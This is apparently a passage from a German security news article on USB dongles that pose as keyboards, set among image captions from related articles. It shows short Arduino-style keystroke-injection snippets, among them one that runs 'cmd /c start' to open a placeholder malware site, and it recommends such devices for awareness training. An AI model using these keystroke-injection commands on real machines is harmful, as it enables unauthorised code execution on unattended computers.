:quality(80)/p7i.vogel.de/wcms/77/96/77965e389847a783a89d16ec537bbdfd/0127091202v1.jpeg "Enterprise Network Firewalls tragen entscheidend zur Absicherung von Unternehmensnetzwerken bei. (Bild: © Bounty – stock.adobe.com / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/8a/d7/8ad77a356a43b3c02e85ce72e1f6c2c3/0127092578v1.jpeg "Security Awareness sorgt für eine Sicherheitskultur, in der Mitarbeitende eine aktive und informierte Verteidigungslinie bilden. (Bild: © photon_photo – stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/d7/14/d714ac0a936f45496f02ffb57415bef2/0127092564v1.jpeg "Endpoint-Protection-Plattformen entwickeln sich zu einem unverzichtbaren Bestandteil der Cyberresilienz moderner Organisationen. (Bild: © Dusty – stock.adobe.com / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/6d/03/6d03ade945fc34db355899cf3261b63d/0130146226v2.jpeg "In den meisten Unternehmen gibt es mehr nicht-menschliche als menschliche Identitäten. Doch diesen fehlt es oftmals an Absicherung. Mit der Einführung von KI-Agenten verschärft sich laut Omada dieses Problem. (©putilov_denis - stock.adobe.com)")
![APT-Angriffe wie Salt Typhoon operieren unauffällig im Netzwerk oft über Monate hinweg. (Bild: © anaumenko - stock.adobe.com [KI-generiert])](https://cdn1.vogel.de/LRVff8NeF8FfV2bFHHeXzafZ09U=/288x162/smart/filters:format(jpg):quality(80)/p7i.vogel.de/wcms/be/f8/bef8b18f122b10cf6d8ea63bf3367273/0130117714v1.jpeg "APT-Angriffe wie Salt Typhoon operieren unauffällig im Netzwerk oft über Monate hinweg. (Bild: © anaumenko - stock.adobe.com [KI-generiert])")
:quality(80)/p7i.vogel.de/wcms/34/ed/34ed90e52696c83ce17f07a36371af51/0130426745v1.jpeg "130 Unternehmen und öffentlichen Einrichtungen in Deutschland wurden zwischen 2019 und 2021 von den Gesuchten lahmgelegt, darunter Krankenhäuser, Kliniken und die Württembergischen Staatstheater in Stuttgart. (Bild: Dall-E / Vogel IT-Medien GmbH / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/00/56/00561a626aee6d4a8014b44645d38cad/0129923840v1.jpeg "Das Angebot dient als vorkonfigurierte beziehungsweise verifizierte Architektur für Hersteller, die private 5G-Netze in der Produktion absichern wollen. (Bild: © Arcurs Co-op/peopleimages.com - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/13/47/13476ec5f128a6cf41f7eb95b2409b7d/0130321401v2.jpeg "Die Sicherheitslücken in Citrix NetScaler Gateway und ADC können zu einem Memory‑Overread führen, der Datenlecks und Abstürze verursachen kann, sowie zu unautorisiertem Zugriff führen. (Bild: lucadp - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/56/0d/560d12454a8cde14262590ceeecb5066/0130406753v1.jpeg "Backup- und Recovery-Strategien müssen heute auch geopolitische Risiken, rechtliche Stabilität und die Ausfallsicherheit von Infrastrukturen berücksichtigen. (Bild: Midjourney / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/95/54/9554c259793d581ea2839245a1815ad4/0130375018v1.jpeg "Während die EU noch an souveränen Clouds arbeitet, ist in vielen Unternehmen bereits eine Rückbesinnung auf On-Prem-Lösungen im Gange. (Bild: Midjourney / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/92/31/9231663c9cda532ebba70ffcd98c71fc/0130376692v2.jpeg "Cyberkriminelle, die die Sicherheitsanfälligkeiten bei Atlassian-Kunden ausnutzen, könnten anfällige Systeme zum Absturz bringen. (Bild: Dall-E / Vogel IT-Medien GmbH / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/28/3c/283c02b6a113d373108ffd46c9255dc3/0130361073v2.jpeg "Tizian Kohler ist Head of Security bei der Adlon Intelligent Solutions GmbH. (Bild: Adlon Intelligent Solutions)")
:quality(80)/p7i.vogel.de/wcms/03/b4/03b4c15b48445e79113c6b95bcf7317c/0129192770v1.jpeg "Lageansicht statt Monitorwand: In der Sicherheitszentrale erscheinen Türen, Kameras und Sensorik als Geopositionen. Videosequenzen werden erst bei korrelierten Signalen und nach Zonenüberschreitung in den Vorfallprozess eingeblendet. (Bild: © Gorodenkoff - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/65/d6/65d68a4361e126b94d503df6bb261ba3/0130366883v2.jpeg "Cyberkriminelle könnten sich mit den von AstraZeneca Zugang zu internen Systemen verschaffen, gezielte Phishing‑ und Supply‑Chain‑Angriffe starten, geistiges Eigentum stehlen oder sabotieren und das Unternehmen erpressen. (Bild: © elimicel - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/10/e5/10e500b0c715720161aed2f77afce5f4/0130043987v2.jpeg "Die ISC2 Cybersecurity Workforce Study wird jährlich durchgeführt, um die Entwicklung der Cybersicherheits-Arbeitskräfte zu analysieren, bestehende Hürden für Fachkräfte zu identifizieren und Lösungen aufzuzeigen. Der Report beleuchtet zunehmend auch die Wahrnehmungen von Frauen in der Cybersicherheitsbranche. (Bild: © Angelo/peopleimages.com – stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/90/19/901975bd25ae76f877ea0f8ac72012ae/0130401069v2.jpeg "Regierungsdaten seien bei dem Cyberangriff auf das E-Mail-Postfach des FBI-Chefs Kash Pate nicht gestohlen worden. (Bild: Dall-E / Vogel IT-Medien GmbH / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/13/e5/13e52ba754a65049c995146bac2f5426/0130048944v2.jpeg "Das US-Außenministerium hat sechs Männer sanktioniert, die zu CyberAv3ngers gehören. (Bild: Dall-E / Vogel IT-Medien GmbH / KI-generiert)")
:quality(80)/p7i.vogel.de/wcms/43/d2/43d2604538d6ae5a50d26cccc98cb9e6/0130112281v1.jpeg "IT-Governance ist ein wesentlicher Bestandteil der Unternehmensführung und bildet einen Ordnungsrahmen für die IT. (Bild: @indypendenz via Canva: Visual Suite for Everyone)")
:quality(80)/p7i.vogel.de/wcms/a0/8a/a08ac0cb9a60ba7fa981a3b9ff8ba04f/0129989079v1.jpeg "BitLocker bietet mehrere Optionen zur Sicherung des Wiederherstellungsschlüssels, wie den Schlüssel auf einem USB-Laufwerk zu speichern oder in einem Microsoft-Konto zu hinterlegen. (Bild: Dall-E / Vogel IT-Medien GmbH / KI-generiert)")
:quality(80)/images.vogel.de/vogelonline/bdb/1804200/1804272/original.jpg "XDR (Extended Detection and Response) erkennt Angriffe auf Endpoints frühzeitig. (Darwin Laganzon)")
:quality(80)/images.vogel.de/vogelonline/bdb/1804200/1804284/original.jpg "Eine wirksame Notfallvorsorge muss auch fortschrittliche Attacken vorhersehen. (Tumisu)")
:quality(80)/images.vogel.de/vogelonline/bdb/1801500/1801554/original.jpg "Der Schutz von Operational Technology erfordert spezielle Security-Maßnahmen. (Gerd Altmann)")
:quality(80)/images.vogel.de/vogelonline/bdb/1801500/1801534/original.jpg "Security-by-Design ist bei Cloud-Apps besonders wichtig. (Werner Moser)")
Anbieter zum Thema
:fill(fff,0)/p7i.vogel.de/companies/68/2d/682dd583dcc4c/fsas-afc-horizontal-2-positive-rgb-nov24.png "fsas-afc-horizontal-2-positive-rgb-nov24 (Fsas)")
:fill(fff,0)/p7i.vogel.de/companies/67/f6/67f625705f340/ftapi-logo.jpeg "ftapi-logo (FTAPI Software GmbH)"){kind=logo}
Welche Funktionen sind möglich?
Es gibt verschiedenste Libraries mit umfrangreichen Funktionen. So kann die Funktion „CommandAtRunBarMSWIN(char *SomeCommand)“ einen übergebenen Befehl in Windows ausführen.
Folgendes Beispiel öffnet Notepad und gibt den Text „Hallo Security-Insider“ ein:
CommandAtRunBar(„notepad.exe“);delay(1000);Keyboard.print(„Hallo Security-Insider“);
Es ist auch möglich, dass der USB-Dongle den Mauszeiger zufällig bewegt, um so den Benutzer zu irritieren:
Mouse.move(random(-100,100),random(-100,100));Mouse.click();
Angesichts derartiger Manipulationen ist es wohl kaum verwunderlich, dass auch der Browser und damit eine Webseite mit Schadcode geöffnet werden kann:
CommandAtRunBar(“cmd /c start http://www.malwarewebseite.com“);
Dies sind nur wenige von vielen Möglichkeiten – und nun sollte besonders klar sein, welches mächtige Werkzeug ein solcher USB-Dongle sein kann.
Fazit
In Anbetracht der Tatsache, dass ein solches Device keine Wirkung bei gesperrten Systemen hat, da es die Login-Aufforderung nicht umgehen kann, ist die tatsächliche Einsatzmöglichkeit beschränkt. Im Rahmen von Securiy-Schulungen und Sensibilisierungs-Workshops kann ein solcher USB-Stick aber eine sehr hohe Wirkung erzielen.
Inhalt
- Seite 1: USB-Risiken Autostart und Stuxnet
- Seite 2: USB-Angriff der anderen Art
- Seite 3: Welche Funktionen sind möglich?
(ID:2047765)
:quality(80)/p7i.vogel.de/wcms/58/7a/587a5e0cb2ed54b8ea3140614bf55539/0125166953v1.jpeg "Eine kritische Schwachstelle im RDP-Protokoll ermöglicht eine neue Angriffsmethode, die Schutzmaßnahmen bei RDP umgeht. (Bild: © Duminda - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/a2/26/a2267a6d2e92c26762a8b4165068a5f5/0127758847v1.jpeg "Gaia als Sinnbild digitaler Souveränität. Hier als Mahnzeichen für Schwachstellen, die im Verborgenen wurzeln und gezielt von chinesischen APT-Gruppen unterwandert werden. (Bild: Midjourney / Paula Breukel / KI-generiert)")